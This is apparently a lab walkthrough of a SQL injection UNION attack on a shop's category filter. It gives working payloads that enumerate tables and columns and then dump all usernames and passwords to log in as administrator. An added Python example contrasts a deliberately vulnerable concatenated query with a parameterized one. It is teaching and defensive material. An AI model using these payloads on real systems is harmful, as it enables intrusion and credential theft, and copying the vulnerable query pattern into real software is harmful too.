Use Burp Suite to intercept and modify the request that sets the product category filter.
Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter:
'+UNION+SELECT+'abc','def'--
Use the following payload to retrieve the list of tables in the database:
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
Find the name of the table containing user credentials.
Use the following payload (replacing the table name) to retrieve the details of the columns in the table:
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
Find the names of the columns containing usernames and passwords.
Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users:
'+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
Find the password for the administrator user, and use it to log in.
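Why the column-count probe in the steps above succeeds, and what a parameterized query does with the same input, shown as an added example that is not part of the original walkthrough. It uses Python's sqlite3 with a constructed products table as a stand-in for the lab's database; the table, column and function names are assumptions.

```python
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    """Build an in-memory database with constructed sample rows (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE products "
        "(name TEXT, description TEXT, category TEXT, released INTEGER)"
    )
    db.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?)",
        [
            ("Mug", "Ceramic mug", "Gifts", 1),
            ("Lamp", "Desk lamp", "Lighting", 1),
            ("Prototype", "Unreleased item", "Gifts", 0),
        ],
    )
    return db


def filter_vulnerable(db, category):
    # The input is concatenated into the SQL text, so a quote inside it ends
    # the string literal and everything after it is parsed as SQL.
    sql = (
        "SELECT name, description FROM products "
        f"WHERE category = '{category}' AND released = 1"
    )
    return db.execute(sql).fetchall()


def filter_parameterized(db, category):
    # The input is bound as a value; it is only ever compared to the column.
    sql = "SELECT name, description FROM products WHERE category = ? AND released = 1"
    return db.execute(sql, (category,)).fetchall()


# The probe from the steps above, URL-decoded the way the server receives it.
PROBE = unquote_plus("'+UNION+SELECT+'abc','def'--")

if __name__ == "__main__":
    db = make_db()
    print("decoded input:     ", PROBE)
    print("concatenated query:", filter_vulnerable(db, PROBE))
    print("parameterized:     ", filter_parameterized(db, PROBE))
    print("normal input:      ", filter_parameterized(db, "Gifts"))
```

With the concatenated query the probe's row comes back in the product listing, which is the confirmation the steps rely on; with the bound parameter the same input matches no category and returns nothing.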